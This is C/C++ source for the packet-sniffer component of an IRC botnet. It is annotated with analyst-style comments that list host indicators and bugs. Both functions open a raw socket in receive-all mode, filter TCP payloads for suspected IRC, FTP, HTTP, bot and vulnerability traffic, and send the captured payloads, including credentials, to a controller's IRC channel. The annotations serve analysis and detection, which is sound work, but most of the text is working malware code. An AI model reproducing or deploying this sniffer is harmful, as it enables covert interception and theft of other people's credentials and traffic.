/*
 * Sniffer thread body. Opens a raw IP socket bound to the host's first
 * resolved address, switches it to receive-all mode on Windows (SIO_RCVALL,
 * i.e. promiscuous capture of every IP packet the NIC sees), and reports TCP
 * payloads matching the IsSuspicious* heuristics to an IRC channel through
 * g_pMainCtrl->m_cIRC. Loops until g_pMainCtrl->m_bRunning is cleared.
 *
 * Host-level indicators visible in this function: a SOCK_RAW/IPPROTO_IP
 * socket, the SIO_RCVALL ioctl, a once-per-second Sleep() poll while capture
 * is disabled, and outbound IRC lines beginning "Bot sniff", "IRC sniff",
 * "FTP sniff", "HTTP sniff" or "VULN sniff" (the last one goes to the
 * vuln_channel, the others to sniffer_channel).
 *
 * Returns NULL on every path; socket setup failures return early.
 */
void *CSniffer::Run() {
	int sock; sockaddr_in addr_in; hostent *hEnt;
	IPHEADER *ipHeader; TCPHEADER *tcpHeader; char *szPacket;
	char szName[255]={0}; unsigned long lLocalIp;
	addr_in.sin_family=AF_INET; addr_in.sin_port=0; addr_in.sin_addr.s_addr=0;
	// Bind address = first entry of the local hostname's address list.
	// gethostbyname() result is dereferenced without a NULL check.
	gethostname(szName, sizeof(szName)); hEnt=gethostbyname(szName);
	memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length);
	addr_in.sin_addr.s_addr=lLocalIp;

	// Raw socket: requires administrative privileges on every platform.
	sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP); 

	if(sock==INVALID_SOCKET) return NULL;
	if(bind(sock, (sockaddr*)&addr_in, sizeof(sockaddr))==SOCKET_ERROR) {
#ifdef _WIN32
		closesocket(sock);
#else
		close(sock);
#endif // _WIN32
		return NULL; }

// NOTE(review): this block is guarded by WIN32 while the close() above uses
// _WIN32; which macro the build defines decides whether SIO_RCVALL is applied.
#ifdef WIN32
	int optval=1; DWORD dwBytesRet;
	// SIO_RCVALL puts the interface into receive-all mode (all inbound
	// IP traffic, not just packets addressed to this socket).
	if(WSAIoctl(sock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL)==SOCKET_ERROR)
	{	closesocket(sock); return NULL; }
#endif // WIN32

	// ipHeader aliases the start of the receive buffer; the buffer is
	// zero-filled before each recv() so the payload parsed below is
	// NUL-terminated unless a packet fills all 65535 bytes.
	char szRecvBuf[65535]; ipHeader=(IPHEADER*)szRecvBuf; int iRead;

	while(g_pMainCtrl->m_bRunning)
	{	// Clear the buffer
		memset(szRecvBuf, 0, sizeof(szRecvBuf)); iRead=0;

		// Wait till the sniffer is enabled
		// (1 s poll; Sleep() on non-Windows is presumably a project wrapper)
		while(!g_pMainCtrl->m_cBot.sniffer_enabled.bValue) Sleep(1000);
		
		// Read the raw packet
		// (both branches are identical; iRead is assigned but never checked,
		// so an error or zero-length read still falls through to parsing)
#ifdef _WIN32
		iRead=recv(sock, szRecvBuf, sizeof(szRecvBuf), 0);
#else
		iRead=recv(sock, szRecvBuf, sizeof(szRecvBuf), 0);
#endif // _WIN32

		// Process if its a TCP/IP packet
		// (proto 6 == TCP; header offsets assume fixed-size IPHEADER/TCPHEADER,
		// so IP or TCP options are not accounted for — struct sizes not visible here)
		if(ipHeader->proto==6)
		{	tcpHeader=(TCPHEADER*)(szRecvBuf+sizeof(*ipHeader));
			int iSrcPort, iDestPort; char szSrcHost[2048], szDestHost[2048];
			iSrcPort=ntohs(tcpHeader->th_sport); iDestPort=ntohs(tcpHeader->th_dport);
			
			// Skip POP3 (110), SMTP (25) and the bot's own server port.
			if(iSrcPort !=110 && iSrcPort!=25 &&
			   iDestPort !=110 && iDestPort!=25 &&
			   iSrcPort!=g_pMainCtrl->m_cBot.si_port.iValue && iDestPort!=g_pMainCtrl->m_cBot.si_port.iValue)
			{
			sprintf(szSrcHost, "%s", inet_ntoa(to_in_addr(ipHeader->sourceIP)));
			sprintf(szDestHost, "%s", inet_ntoa(to_in_addr(ipHeader->destIP)));

			// Payload is treated as a C string; CR/LF are flattened to spaces
			// so the whole thing fits on one IRC line. strlen() is re-evaluated
			// every iteration.
			szPacket=(char*)(szRecvBuf+sizeof(*tcpHeader)+sizeof(*ipHeader));
			for(int i=0; i<strlen(szPacket); i++) {
				if(szPacket[i]=='\r') szPacket[i]='\x20';
				if(szPacket[i]=='\n') szPacket[i]='\x20'; }

			// Classification order: Bot, IRC, FTP (all excluding port 80),
			// then HTTP and VULN on any port. Only the first match is reported.
			if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousBot(szPacket))

			{	g_pMainCtrl->m_cIRC.SendFormat(false, false, g_pMainCtrl->m_cBot.sniffer_channel.sValue.Str(),
					"Bot sniff \"%s:%d\" to \"%s:%d\": - \"%s\"\n",
					szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
			}


			else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousIRC(szPacket))
			{	g_pMainCtrl->m_cIRC.SendFormat(false, false, g_pMainCtrl->m_cBot.sniffer_channel.sValue.Str(),
					"IRC sniff \"%s:%d\" to \"%s:%d\": - \"%s\"\n",
					szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
			}

			else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousFTP(szPacket))
			{
				g_pMainCtrl->m_cIRC.SendFormat(false, false, g_pMainCtrl->m_cBot.sniffer_channel.sValue.Str(),
					"FTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"\n",
					szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
			}

			else if(IsSuspiciousHTTP(szPacket))
			{
				g_pMainCtrl->m_cIRC.SendFormat(false, false, g_pMainCtrl->m_cBot.sniffer_channel.sValue.Str(),
					"HTTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"\n",
					szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
			}
			// VULN hits are routed to a separate channel.
			else if(IsSuspiciousVULN(szPacket))
			{
				g_pMainCtrl->m_cIRC.SendFormat(false, false, g_pMainCtrl->m_cBot.vuln_channel.sValue.Str(),
					"VULN sniff \"%s:%d\" to \"%s:%d\": - \"%s\"\n",
					szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
			}
		}
	}
	}
	// Note: the socket is not closed on the normal exit path.
	return NULL;
}
/*
 * Windows-only variant of the sniffer thread (cf. CSniffer::Run). Copies the
 * SNIFFER descriptor out of `param`, sets gotinfo so the creator may release
 * it, then opens a raw IP socket in receive-all mode (SIO_RCVALL) and reports
 * TCP payloads matching the IsSuspicious* heuristics to sniff.chan over IRC.
 *
 * The Winsock calls go through f*-prefixed wrappers (fsocket, fbind,
 * fWSAIoctl, frecv, ...), presumably dynamically resolved imports — their
 * definitions are not visible here.
 *
 * Host-level indicators: SOCK_RAW/IPPROTO_IP socket, SIO_RCVALL ioctl, and
 * IRC lines carrying the "[SNIFFER]" tag with "bind() failed",
 * "WSAIoctl() failed" or "<Bot|IRC|FTP|HTTP|VULN> sniff" text; failures are
 * also written through addlog().
 *
 * Terminates via ExitThread(0) on setup failure. The receive loop is
 * `while(1)` with no break, so the cleanup after it is unreachable.
 */
DWORD WINAPI SnifferThread(LPVOID param) { 
   // Local copy of the descriptor; gotinfo signals the creator that the
   // pointed-to struct may be reused.
   SNIFFER sniff = *((SNIFFER *)param); 
   SNIFFER *sniffs = (SNIFFER *)param; 
   sniffs->gotinfo = TRUE; 

   char sendbuf[IRCLINE]; 
   int sock; sockaddr_in addr_in; hostent *hEnt; 
   IPHEADER *ipHeader; tcp_hdr_sniffer *tcpHeader; char *szPacket; 
   char szName[255]={0}; unsigned long lLocalIp; 
   addr_in.sin_family=AF_INET; addr_in.sin_port=0; addr_in.sin_addr.s_addr=0; 
   // Bind address = first entry of the local hostname's address list;
   // the fgethostbyname() result is dereferenced without a NULL check.
   fgethostname(szName, sizeof(szName)); hEnt=fgethostbyname(szName); 
   memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length); 
   addr_in.sin_addr.s_addr=lLocalIp; 

   // Raw socket: requires administrative privileges.
   sock=fsocket(AF_INET,SOCK_RAW,IPPROTO_IP); 

   // NOTE(review): this early return skips clearthread(), unlike the other
   // failure paths below.
   if(sock==INVALID_SOCKET) return NULL; 
   if(fbind(sock, (sockaddr*)&addr_in, sizeof(sockaddr))==SOCKET_ERROR) { 
      sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 bind() failed, returned %d", fWSAGetLastError()); 
      if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
      addlog(sendbuf); 
      fclosesocket(sock); 
      clearthread(sniff.threadnum); 
      ExitThread(0); 
   } 

   // SIO_RCVALL puts the interface into receive-all mode (all inbound IP
   // traffic, not just packets addressed to this socket).
   int optval=1; DWORD dwBytesRet; 
   if(fWSAIoctl(sock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL)==SOCKET_ERROR) 
   { 
      sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 WSAIoctl() failed, returned %d", fWSAGetLastError()); 
      if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
      addlog(sendbuf); 
      fclosesocket(sock); 
      clearthread(sniff.threadnum); 
      ExitThread(0); 
   } 

   // ipHeader aliases the start of the receive buffer; the buffer is
   // zero-filled before each recv() so the payload parsed below is
   // NUL-terminated unless a packet fills all 65535 bytes.
   char szRecvBuf[65535]; ipHeader=(IPHEADER*)szRecvBuf; int iRead; 

   // No exit condition and no break: this loop runs until the thread is
   // killed externally.
   while(1) 
   { 
      // Clear the buffer 
      memset(szRecvBuf, 0, sizeof(szRecvBuf)); iRead=0; 

      // Read the raw packet 
      // (iRead is assigned but never checked; an error or zero-length read
      // still falls through to parsing the zeroed buffer)
      iRead=frecv(sock, szRecvBuf, sizeof(szRecvBuf), 0); 

      // Process if its a TCP/IP packet 
      // (proto 6 == TCP; header offsets assume fixed-size IPHEADER/
      // tcp_hdr_sniffer, so IP/TCP options are not accounted for — struct
      // sizes not visible here)
      if(ipHeader->proto==6) 
      {   tcpHeader=(tcp_hdr_sniffer*)(szRecvBuf+sizeof(*ipHeader)); 
         int iSrcPort, iDestPort; char szSrcHost[2048], szDestHost[2048]; 
         iSrcPort=ntohs(tcpHeader->th_sport); iDestPort=ntohs(tcpHeader->th_dport); 
          
         // Skip POP3 (110) and SMTP (25) in either direction.
         if(iSrcPort !=110 && iSrcPort!=25 && 
            iDestPort !=110 && iDestPort!=25) 
         { 
         sprintf(szSrcHost, "%s", inet_ntoa(to_in_addr(ipHeader->sourceIP))); 
         sprintf(szDestHost, "%s", inet_ntoa(to_in_addr(ipHeader->destIP))); 

         // Payload is treated as a C string; CR/LF are flattened to spaces
         // so it fits on one IRC line. strlen() is re-evaluated each iteration.
         szPacket=(char*)(szRecvBuf+sizeof(*tcpHeader)+sizeof(*ipHeader)); 
         for(int i=0; i<(int)strlen(szPacket); i++) { 
            if(szPacket[i]=='\r') szPacket[i]='\x20'; 
            if(szPacket[i]=='\n') szPacket[i]='\x20'; } 

         // Classification order: Bot, IRC, FTP (all excluding port 80),
         // then HTTP and VULN on any port. Only the first match is reported.
         // The payload can be far longer than IRCLINE; _snprintf truncates,
         // and on MSVC a truncated _snprintf result is not NUL-terminated
         // (presumably the case here — confirm against the build target).
         if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousBot(szPacket)) 
         { 
            _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 Bot sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
         } 


         else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousIRC(szPacket)) 
         { 
            _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 IRC sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
         } 

         else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousFTP(szPacket)) 
         { 
            _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 FTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
         } 

         else if(IsSuspiciousHTTP(szPacket)) 
         { 
            _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 HTTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
         } 
         // Unlike CSniffer::Run, VULN hits go to the same channel as the rest.
         else if(IsSuspiciousVULN(szPacket)) 
         { 
            _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 VULN sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
         } 
      } 
   } 
   } 
   // Unreachable: the while(1) above never exits.
   fclosesocket(sock); 
   clearthread(sniff.threadnum); 
   ExitThread(0); 
   return 0; 
}